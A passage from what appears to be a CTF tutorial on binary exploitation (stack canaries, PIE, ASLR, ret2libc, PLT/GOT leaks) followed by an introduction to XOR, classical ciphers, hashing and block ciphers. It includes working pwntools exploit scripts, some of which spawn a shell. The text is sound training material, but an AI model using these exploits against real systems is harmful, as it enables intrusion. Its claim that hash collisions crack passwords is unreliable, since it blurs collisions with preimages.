0xffea8afc 0x41574141 0x41415841 0x5a414159 0x41614141 AAWAAXAAYAAZAAaA
0xffea8b0c 0x41416241 0x64414163 0x41654141 0x41416641 AbAAcAAdAAeAAfAA
Now we can check the canary and EIP offsets:
[0x0804920f]> wopO 0x41574141
64
[0x0804920f]> wopO 0x41416241
80
The return pointer is 16 bytes after the start of the canary, so 12 bytes after the end of the canary.
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')
payload = b'A' * 64 # padding up to the canary
payload += p32(canary) # overwrite canary with original value to not trigger
payload += b'A' * 12 # pad to return pointer
payload += p32(0x08049245) # hardcoded return target (No PIE, so the address is fixed)
p.clean()
p.sendline(payload)
print(p.clean().decode('latin-1'))
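To make the layout of that payload explicit, here is a minimal sketch using only the standard library instead of pwntools. The offsets (64 bytes to the canary, 12 bytes between canary and return pointer) come from the analysis above; `build_canary_payload` is a hypothetical helper name and the canary value is just the one from the sample run.

```python
import struct

def build_canary_payload(canary, return_address, canary_offset=64, gap=12):
    """Lay out: padding | canary | padding | return address (32-bit, little-endian)."""
    payload = b"A" * canary_offset              # fill the buffer up to the canary
    payload += struct.pack("<I", canary)        # rewrite the canary with its own value
    payload += b"A" * gap                       # bytes between the canary and the return pointer
    payload += struct.pack("<I", return_address)
    return payload

payload = build_canary_payload(0xCC987300, 0x08049245)
print(len(payload), payload[64:68].hex(), payload[80:84].hex())
```

Because the canary's low byte is 00 and the packing is little-endian, the null byte is the first canary byte written, which is why an input function such as gets() that accepts null bytes matters here.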
64-bit
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
Remember, in 64-bit the first format string arguments are taken from registers before the stack is used, and each value is 8 bytes wide, so the offset may be different.
Bruteforcing the Canary
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and loads of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{. This can take ages to run and is frankly not a particularly interesting challenge.
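A rough back-of-the-envelope sketch of why the word size matters, assuming the whole canary has to be guessed blindly on each run and that its low byte is always 00 (as noted earlier). `canary_keyspace` is a hypothetical helper name.

```python
def canary_keyspace(pointer_bits):
    """Number of possible canary values when the low byte is fixed to 0x00."""
    random_bytes = pointer_bits // 8 - 1   # every byte except the null one
    return 256 ** random_bytes

for bits in (32, 64):
    print(f"{bits}-bit: {canary_keyspace(bits)} possible canaries")
```

On 32-bit that is 2^24 candidates, which is slow but reachable; on 64-bit it is 2^56, which is why guessing the full value is not realistic there.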
PIE
Position Independent Code
Overview
PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.
Analysis
Luckily, this does not mean it's impossible to exploit. PIE executables are based on relative rather than absolute addresses, meaning that while the locations in memory are fairly random, the offsets between different parts of the binary remain constant. For example, if you know that the function main is located 0x128 bytes in memory after the base address of the binary, and you somehow find the location of main, you can simply subtract 0x128 from this to get the base address, and from that the addresses of everything else.
Exploitation
So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?
The stack of course!
We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value of the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!
Double-Checking
Due to the way PIE randomization works, the base address of a PIE executable will always end in the hexadecimal characters 000. This is because pages are the things being randomized in memory, which have a standard size of 0x1000. Operating Systems keep track of page tables that point to each section of memory and define the permissions for each section, similar to segmentation.
Checking the base address ends in 000 should probably be the first thing you do if your exploit is not working as you expected.
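The subtraction and the "ends in 000" sanity check can be sketched in a few lines. The leak and offset below are illustrative values only, and `pie_base` is a hypothetical helper name rather than anything from pwntools.

```python
PAGE_SIZE = 0x1000

def pie_base(leaked_address, symbol_offset):
    """Recover the binary base from one leaked address and its known offset."""
    base = leaked_address - symbol_offset
    if base % PAGE_SIZE != 0:
        # A base that is not page-aligned usually means a wrong leak or offset.
        raise ValueError(f"suspicious base {hex(base)}: does not end in 000")
    return base

base = pie_base(0x5655D1B9, 0x11B9)   # illustrative leak of main and its offset
print(hex(base))
```

Failing loudly on a misaligned base is a design choice: it surfaces a bad leak immediately rather than after a crashed payload.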
Pwntools, PIE, and ROP
As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address will automatically update all the function and symbol addresses for you, meaning you don't have to worry about using readelf or other command line tools, but instead can receive it all dynamically.
Not to mention that the ROP capabilities are incredibly powerful as well.
PIE Bypass with Given Leak
Exploiting PIE with a given leak
The Source
#include <stdio.h>
int main() {
vuln();
return 0;
}
void vuln() {
char buffer[20];
printf("Main Function is at: %lx\n", main);
gets(buffer);
}
void win() {
puts("PIE bypassed! Great job :D");
}
Pretty simple - we print the address of main, which we can read and calculate the base address from. Then, using this, we can calculate the address of win() itself.
Analysis
Let's just run the binary to make sure it behaves as expected :D
$ ./vuln-32
Main Function is at: 0x5655d1b9
Yup, and as we expected, it prints the location of main.
Exploitation
First, let's set up the script. We create an ELF object, which becomes very useful later on, and start the process.
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
Now we want to take in the location of the main function. To do this we can simply receive everything up to the address (and do nothing with it) and then read the address itself.
p.recvuntil('at: ')
main = int(p.recvline(), 16)
Since we received the entire line except for the address, only the address will come up with p.recvline().
Now we'll use the ELF object we created earlier and set its base address. The sym dictionary returns the offsets of the functions from the binary base until the base address is set, after which it returns the absolute address in memory.
elf.address = main - elf.sym['main']
In this case, elf.sym['main'] will return 0x11b9; if we looked it up again after setting the base, it would return 0x11b9 + the base address. So, essentially, we're subtracting the offset of main from the address we leaked to get the base of the binary.
Now we know the base we can just call win().
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
By this point, I assume you know how to find the padding length and other stuff we've been mentioning for a while, so I won't be showing you every step of that.
And does it work?
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D
Awesome!
Final Exploit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
Summary
From the leaked address of main, we were able to calculate the base address of the binary. From this, we could then calculate the address of win and call it.
And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.
64-bit
Try this for yourself first, then feel free to check the solution. Same source, same challenge.
PIE Bypass
Using format string
The Source
#include <stdio.h>
void vuln() {
char buffer[20];
printf("What's your name?\n");
gets(buffer);
printf("Nice to meet you ");
printf(buffer);
printf("\n");
puts("What's your message?");
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
Unlike last time, we aren't given the address of a function. We'll have to leak one with format strings.
Analysis
$ ./vuln-32
What's your name?
%p
Nice to meet you 0xf7f6d080
What's your message?
hello
Everything's as we expect.
Exploitation
Setup
As last time, first, we set everything up.
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
PIE Leak
Now we just need a leak. Let's try a few offsets.
$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
The 3rd one looks like a binary address, so let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (it doesn't really matter where).
$ r2 -d -A vuln-32
Process with PID 5548 started...
= attach 5548 5548
bin.baddr 0x565ef000
[0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
%3$p
Nice to meet you 0x565f01d5
We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5. Therefore, subtracting 0x11d5 from the leaked address should give us the binary base. Let's leak the value and get the base address.
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check
Now we just need to send the exploit payload.
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
Final Exploit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}')
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
64-bit
Same deal, just 64-bit. Try it out :)
ASLR
Address Space Layout Randomisation
Overview
ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc PIE, there is a key difference. ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependent on the environment running the binary. If I sent you a binary that I compiled while I had ASLR disabled, it wouldn't make any difference at all if you had ASLR enabled.
Of course, as with PIE, this means you cannot hardcode values such as function addresses (e.g. system for a ret2libc).
The Format String Trap
It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.
When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.
Instead, a more reliable way is reading the GOT entry of a specific function.
Double-Checking
For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000.
ASLR Bypass with Given Leak
The Source
#include <stdio.h>
#include <stdlib.h>
void vuln() {
char buffer[20];
printf("System is at: %lp\n", system);
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
Just as we did for PIE, except this time we print the address of system.
Analysis
$ ./vuln-32
System is at: 0xf7de5f00
Yup, does what we expected.
Your address of system might end in different characters - that just means you have a different libc version.
Exploitation
Much of this is as we did with PIE.
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
Note that we include the libc here - this is just another ELF object that makes our lives easier.
Parse the address of system and calculate the libc base from that (as we did with PIE):
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
Now we can finally ret2libc, using the libc ELF object to really simplify it for us:
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
Final Exploit
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
64-bit
Try it yourself :)
Using pwntools
If you prefer, you could have changed the following payload to be more pwntoolsy:
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
Instead, you could do:
binsh = next(libc.search(b'/bin/sh'))
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)
p.sendline(rop.chain())
The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.
PLT and GOT
Bypassing ASLR
The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binaries in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the functionality. For example, each ELF file will not carry its own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.
So when it's on a new system, it replaces function calls with hardcoded addresses?
Not quite.
The problem with this approach is it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that ASLR exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
The PLT and GOT
The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.
When you call puts() in C and compile it as an ELF executable, it is not actually puts() - instead, it gets compiled as puts@plt. You can check this in GDB.
Why does it do that?
Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:
- If there is a GOT entry for puts, it jumps to the address stored there.
- If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc functions. puts@got, for example, will contain the address of puts in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with ld.so (also called the dynamic linker/loader) to get the function address and store it in the GOT.
How is this useful for binary exploitation?
Well, there are two key takeaways from the above explanation:
- Calling the PLT address of a function is equivalent to calling the function itself
- The GOT address contains addresses of functions in libc, and the GOT is within the binary.
The use of the first point is clear - if we have a PLT entry for a desirable libc function, for example system, we can just redirect execution to its PLT entry and it will be the equivalent of calling system directly; no need to jump into libc.
The second point is less obvious, but arguably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc function's address. If you have an arbitrary read, it's trivial to leak the real address of the libc function and therefore bypass ASLR.
Exploiting an Arbitrary Read
There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be returned but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.
ret2plt
A ret2plt is a common technique that involves calling puts@plt and passing the GOT entry of puts as a parameter. This causes puts to print out its own address in libc. You then set the return address to the function you are exploiting in order to call it again and enable you to send a second payload that uses the leak.
# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)
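# 64-bit
payload = flat(
    b'A' * padding,
    POP_RDI,              # address of a `pop rdi; ret` gadget
    elf.got['puts'],      # argument for puts: its own GOT entry
    elf.plt['puts'],
    elf.symbols['main']   # return to main so the bug can be triggered again
)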
flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time.
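To make that packing behaviour concrete, here is a simplified stand-in written with the standard library. It is not pwntools' implementation (the real flat() handles many more input types and reads the word size from context); `flat_sketch` and its `word_size` parameter are hypothetical names for illustration.

```python
import struct

def flat_sketch(*items, word_size=4):
    """Concatenate items, packing integers as little-endian machine words."""
    fmt = "<I" if word_size == 4 else "<Q"   # p32-like or p64-like packing
    out = b""
    for item in items:
        if isinstance(item, int):
            out += struct.pack(fmt, item)    # integers become packed addresses
        elif isinstance(item, str):
            out += item.encode("latin-1")    # strings are passed through as bytes
        else:
            out += bytes(item)               # bytes-like values are appended as-is
    return out

print(flat_sketch(b"AAAA", 0x08049245).hex())
print(flat_sketch(0x401136, word_size=8).hex())
```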
%s format string
This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way as to complicate future payloads, for example when stack pivoting.
payload = p32(elf.got['puts']) # p64() if 64-bit
payload += b'|'
payload += b'%3$s' # The third parameter points at the start of the buffer
# this part is only relevant if you need to call the function again
payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])
# Send it off...
p.recvuntil(b'|') # This is not required
puts_leak = u32(p.recv(4)) # 4 bytes because it's 32-bit
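Once the raw bytes of the GOT entry have been received, turning them into a libc base is a small calculation. The sketch below assumes a 32-bit target and takes only the first 4 bytes, as the note above about null-terminated output recommends. The offset of puts and the fake leak are made-up illustrative values, and `libc_base_from_leak` is a hypothetical helper name.

```python
import struct

def libc_base_from_leak(raw, symbol_offset):
    """Unpack the first 4 leaked bytes as a little-endian address and rebase."""
    leaked_address = struct.unpack("<I", raw[:4])[0]   # ignore anything printed after it
    return leaked_address - symbol_offset

PUTS_OFFSET = 0x67360   # hypothetical offset of puts inside the target libc
# Simulated output: the GOT entry followed by unrelated bytes up to a null byte.
raw = struct.pack("<I", 0xF7D00000 + PUTS_OFFSET) + b"\x10\x20junk"

print(hex(libc_base_from_leak(raw, PUTS_OFFSET)))
```

As with PIE, a result that does not end in 000 is a strong hint that the offset or the libc version is wrong.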
Summary
- The PLT and GOT do the bulk of dynamic linking
- The PLT resolves actual locations in libc of functions you use and stores them in the GOT
  - Next time that function is called, it jumps to the GOT and resumes execution there
- Calling function@plt is equivalent to calling the function itself
- An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating the libc base
Cryptography
https://ctf101.org/cryptography/overview/
Cryptography is the reason we can use banking apps, transmit sensitive information over the web, and in general protect our privacy. However, a large part of CTFs is breaking widely used encryption schemes that are improperly implemented. The math may seem daunting, but more often than not, a simple understanding of the underlying principles will allow you to find flaws and crack the code.
The word “cryptography” technically means the art of writing codes. When it comes to digital forensics, it’s a method you can use to understand how data is constructed for your analysis.
What is cryptography used for?
Uses in everyday software
- Securing web traffic (passwords, communication, etc.)
- Securing copyrighted software code
Malicious uses
- Hiding malicious communication
- Hiding malicious code
Topics
- XOR
- Caesar Cipher
- Substitution Cipher
- Vigenere Cipher
- Hashing Functions
- Block Ciphers
- Stream Ciphers
- RSA
XOR
Data Representation
Data can be represented in different bases. For a computer to work with a character such as 'A', it needs a numerical representation in base 2 (binary).
XOR Basics
An XOR or eXclusive OR is a bitwise operation indicated by ^ and shown by the following truth table:
A | B | A ^ B |
---|---|---|
0 | 0 | 0 |
0 | 1 | 1 |
1 | 0 | 1 |
1 | 1 | 0 |
So XOR'ing the bytes `0xA0 ^ 0x2C` translates to:
Byte | Bits |
---|---|
0xA0 | 1 0 1 0 0 0 0 0 |
0x2C | 0 0 1 0 1 1 0 0 |
0xA0 ^ 0x2C | 1 0 0 0 1 1 0 0 |
`0b10001100` is equivalent to `0x8C`. A cool property of XOR is that it is reversible, meaning `0x8C ^ 0x2C = 0xA0` and `0x8C ^ 0xA0 = 0x2C`.
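The same arithmetic can be checked directly in Python; this is just a quick confirmation of the worked example, using throwaway variable names.

```python
a, b = 0xA0, 0x2C
c = a ^ b

# Show all three values as 8-bit binary strings.
print(f"{a:08b} ^ {b:08b} = {c:08b}")

# XOR is its own inverse: applying either operand again recovers the other.
print(hex(c ^ b), hex(c ^ a))
```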
What does this have to do with CTF?
XOR is a cheap way to encrypt data with a password. Any data can be encrypted using XOR as shown in this Python example:
>>> data = 'CAPTURETHEFLAG'
>>> key = 'A'
>>> encrypted = ''.join([chr(ord(x) ^ ord(key)) for x in data])
>>> encrypted
'\x02\x00\x11\x15\x14\x13\x04\x15\t\x04\x07\r\x00\x06'
>>> decrypted = ''.join([chr(ord(x) ^ ord(key)) for x in encrypted])
>>> decrypted
'CAPTURETHEFLAG'
This can be extended using a multibyte key by iterating in parallel with the data.
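A minimal sketch of that multibyte extension, working on bytes rather than str. `xor_bytes` is a hypothetical helper name and the key `KEY` is only an example.

```python
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a key that repeats for as long as the data lasts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

encrypted = xor_bytes(b"CAPTURETHEFLAG", b"KEY")
decrypted = xor_bytes(encrypted, b"KEY")   # the same call decrypts
print(encrypted.hex(), decrypted)
```

With a one-byte key this reduces to the single-character example above.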
Exploiting XOR Encryption
Single Byte XOR Encryption
Single Byte XOR Encryption is trivial to bruteforce as there are only 256 possible keys to try (255 if you ignore the zero key, which leaves the data unchanged).
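A sketch of that bruteforce, run against the ciphertext from the Python example earlier. It assumes you know a fragment of the plaintext (a "crib", here `FLAG`) to recognise the right key; without one you would score candidates some other way, for example by character frequency. `bruteforce_single_byte_xor` is a hypothetical helper name.

```python
def bruteforce_single_byte_xor(ciphertext: bytes, crib: bytes):
    """Try every one-byte key and keep the candidates that contain the crib."""
    hits = []
    for key in range(256):
        candidate = bytes(b ^ key for b in ciphertext)
        if crib in candidate:
            hits.append((key, candidate))
    return hits

ciphertext = b"\x02\x00\x11\x15\x14\x13\x04\x15\t\x04\x07\r\x00\x06"
for key, plaintext in bruteforce_single_byte_xor(ciphertext, b"FLAG"):
    print(chr(key), plaintext)
```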
Multibyte XOR Encryption
Multibyte XOR gets exponentially harder to bruteforce the longer the key, but if the encrypted text is long enough, character frequency analysis is a viable method to find the key. Character Frequency Analysis means that we split the ciphertext into groups based on the position of each character within the key, so that every group is encrypted with a single key byte. These groups are then bruteforced using the idea that some letters appear more frequently in English text than others.
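The grouping step can be sketched as follows, assuming the key length is already known or guessed. The plaintext and key are made-up examples, and `split_by_key_position` is a hypothetical helper name.

```python
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, used here only to produce a sample ciphertext."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

def split_by_key_position(ciphertext: bytes, key_length: int):
    """Group i holds every byte that was XORed with key byte i."""
    return [ciphertext[i::key_length] for i in range(key_length)]

plaintext = b"CAPTURE THE FLAG AT ANY COST"
key = b"KEY"
groups = split_by_key_position(xor_bytes(plaintext, key), len(key))

# Each group is now an independent single-byte XOR problem.
for position, group in enumerate(groups):
    print(position, bytes(b ^ key[position] for b in group))
```

Each group can then be attacked separately, scoring candidate key bytes by how English-like the resulting characters are.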
Substitution Cipher
A Substitution Cipher is a system of encryption where different symbols substitute a normal alphabet.
Caesar Cipher/ROT 13
The Caesar Cipher or Caesar Shift is a cipher that shifts the letters of the alphabet by a fixed amount to encode texts.
`CAESAR` encoded with a shift of 8 is `KIMAIZ`, so `ABCDEFGHIJKLMNOPQRSTUVWXYZ` becomes `IJKLMNOPQRSTUVWXYZABCDEFGH`.
ROT13 is the same thing but with a fixed shift of 13. This is a trivial cipher to bruteforce because there are only 25 shifts.
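A short sketch of the shift and of the 25-shift bruteforce, assuming uppercase A-Z text (other characters are passed through unchanged). `caesar` and `bruteforce_caesar` are hypothetical helper names.

```python
import string

ALPHABET = string.ascii_uppercase

def caesar(text: str, shift: int) -> str:
    """Shift every uppercase letter by `shift` places, wrapping around at Z."""
    out = []
    for ch in text:
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)   # leave spaces, digits, punctuation alone
    return "".join(out)

def bruteforce_caesar(ciphertext: str) -> dict:
    """Undo every possible shift; the reader picks the one that looks like text."""
    return {shift: caesar(ciphertext, -shift) for shift in range(1, 26)}

print(caesar("CAESAR", 8))
print(bruteforce_caesar("KIMAIZ")[8])
```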
Vigenere Cipher
A Vigenere Cipher is an extended Caesar Cipher where a message is encrypted using various Caesar-shifted alphabets.
The following table can be used to encode a message:
Encryption
For example, encrypting the text SUPERSECRET with CODE would follow this process:
- CODE gets repeated to the length of SUPERSECRET so the key becomes CODECODECOD
- For each letter in SUPERSECRET we use the table to get the alphabet to use, in this instance row C and column S
- The ciphertext's first letter then becomes U
- We eventually get UISITGHGTSW
Decryption
- Go to the row of the key, in this case, C
- Find the letter of the ciphertext in this row, in this case U
- The column is the first letter of the decrypted plaintext, so we get S
- After repeating this process we get back to SUPERSECRET
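The table lookup is equivalent to adding (or, for decryption, subtracting) the key letter's position modulo 26, which gives a compact sketch. It assumes both text and key contain only uppercase A-Z; `vigenere` is a hypothetical helper name.

```python
from itertools import cycle

A = ord("A")

def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift each letter by the matching key letter; the key repeats as needed."""
    sign = -1 if decrypt else 1
    out = []
    for ch, k in zip(text, cycle(key)):
        shift = sign * (ord(k) - A)                       # row chosen by the key letter
        out.append(chr((ord(ch) - A + shift) % 26 + A))   # column lookup, wrapped at Z
    return "".join(out)

ciphertext = vigenere("SUPERSECRET", "CODE")
print(ciphertext)
print(vigenere(ciphertext, "CODE", decrypt=True))
```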
Hashing Functions
Hashing functions are one-way functions that ideally produce a different output for every input. MD5, SHA-1, and other hashes that were once considered secure have since been found to have collisions: two different pieces of data which produce the same, supposedly unique, output.
String Hashing
A string hash is a number or string generated using an algorithm that runs on text or data.
The idea is that each hash should be unique to the text or data (although sometimes it isn’t). For example, the hash for “dog” should be different from other hashes.
You can use command line tools or online resources to compute hashes. Example:
$ echo -n password | md5
5f4dcc3b5aa765d61d8327deb882cf99
Here, “password” is hashed with different hashing algorithms:
- SHA-1: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
- SHA-256 (SHA-2): 5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D1542D8
- MD5: 5F4DCC3B5AA765D61D8327DEB882CF99
- CRC32: BBEDA74F
Generally, when verifying a hash visually, you can simply look at the first and last four characters of the string.
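The MD5, SHA-1, and SHA-256 values listed above can be reproduced with Python's standard hashlib module; a minimal sketch (the dictionary name is arbitrary):

```python
import hashlib

word = b"password"

# hexdigest() returns lowercase hex; the list above shows the same digests in uppercase.
digests = {
    "md5": hashlib.md5(word).hexdigest(),
    "sha1": hashlib.sha1(word).hexdigest(),
    "sha256": hashlib.sha256(word).hexdigest(),
}

for name, value in digests.items():
    print(f"{name}: {value}")
```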
File Hashing
A file hash is a number or string generated using an algorithm that is run on a file's contents. The premise is that it should be unique to that content. If the file changes in any way, the hash will change.
What is it used for?
- File and data identification
- Password/certificate storage comparison
How can we determine the hash of a file? You can use the md5sum command (or similar).
$ md5sum samplefile.txt
3b85ec9ab2984b91070128be6aae25eb samplefile.txt
Hash Collisions
A collision is when two pieces of data or text have the same cryptographic hash. This is very rare.
What’s significant about collisions is that they can be used to crack password hashes. Passwords are usually stored as hashes on a computer since it’s hard to get the passwords from hashes.
If you bruteforce by trying every possible piece of text or data, eventually you’ll find something with the same hash. Enter it, and the computer accepts it as if you entered the actual password.
Two different files on the same hard drive with the same cryptographic hash can be very interesting.
“It’s now well-known that the cryptographic hash function MD5 has been broken,” said Peter Selinger of Dalhousie University. “In March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they described an algorithm that can find two different sequences of 128 bytes with the same MD5 hash.”
For example, he cited this famous pair:
and
Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4.
Selinger said that “the algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes.”
Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl’s Illustrated Guide. And here’s a good article from DFI News that explores the same topic.
Block Ciphers
A Block Cipher is an algorithm that is used in conjunction with a cryptosystem to package a message into evenly distributed 'blocks' which are encrypted one at a time.
Definitions
- Mode of Operation: How a block cipher is applied to an amount of data that exceeds a block's size
- Initialization Vector (IV): A sequence of bytes that is used to randomize encryption even if the same plaintext is encrypted
- Starting Variable (SV): Similar to the IV, except it is used during the first block to provide a random seed during encryption
- Padding: Padding is used to ensure that the block sizes all line up and ensure the last block fits the block cipher
- Plaintext: Unencrypted text; Data without obfuscation
- Key: A secret used to encrypt plaintext
- Ciphertext: Plaintext encrypted with a key
Common Block Ciphers
Mode | Formula | Ciphertext |
---|---|---|
ECB | Y_i = F(PlainText_i, Key) | Y_i |
CBC | Y_i = PlainText_i XOR Ciphertext_{i-1} | F(Y_i, Key); Ciphertext_0 = IV |
PCBC | Y_i = PlainText_i XOR (Ciphertext_{i-1} XOR PlainText_{i-1}) | F(Y_i, Key); Ciphertext_0 = IV |
CFB | Y_i = Ciphertext_{i-1} | PlainText_i XOR F(Y_i, Key); Ciphertext_0 = IV |
OFB | Y_i = F(Key, Y_{i-1}); Y_0 = IV | PlainText_i XOR Y_i |
CTR | Y_i = F(Key, IV + g(i)); IV = token() | PlainText_i XOR Y_i |
Note
In this case, i represents an index over the number of blocks in the plaintext. F() represents the block cipher function used to convert plaintext into ciphertext, and g() maps the block index to a counter value.
Electronic Codebook (ECB)
ECB is the most basic block cipher mode: it simply chunks the plaintext into blocks, encrypts those blocks independently, and chains the results together into a ciphertext.
Flaws
Because ECB independently encrypts the blocks, patterns in data can still be seen clearly, as shown in the ECB Penguin image below.
Original Image | ECB Image | Other Block Cipher Modes |
---|---|---|
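The pattern leak can also be seen without an image. The sketch below is only an illustration: the standard library has no real block cipher, so `toy_block_function` is a stand-in built from truncated SHA-256 (it cannot be decrypted and is not a real cipher). All names, keys, and IVs are hypothetical.

```python
import hashlib

BLOCK = 16

def toy_block_function(key: bytes, block: bytes) -> bytes:
    """Stand-in for F(block, key): deterministic, but NOT a real, invertible cipher."""
    return hashlib.sha256(key + block).digest()[:BLOCK]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def ecb_blocks(key: bytes, plaintext: bytes):
    """Every block is processed independently of the others."""
    return [toy_block_function(key, plaintext[i:i + BLOCK])
            for i in range(0, len(plaintext), BLOCK)]

def cbc_blocks(key: bytes, iv: bytes, plaintext: bytes):
    """Every block is first XORed with the previous output (the IV for block 0)."""
    previous, out = iv, []
    for i in range(0, len(plaintext), BLOCK):
        previous = toy_block_function(key, xor(plaintext[i:i + BLOCK], previous))
        out.append(previous)
    return out

key, iv = b"hypothetical key", b"\x00" * BLOCK
plaintext = b"A" * (2 * BLOCK)        # two identical plaintext blocks

ecb = ecb_blocks(key, plaintext)
cbc = cbc_blocks(key, iv, plaintext)
print("ECB blocks equal:", ecb[0] == ecb[1])
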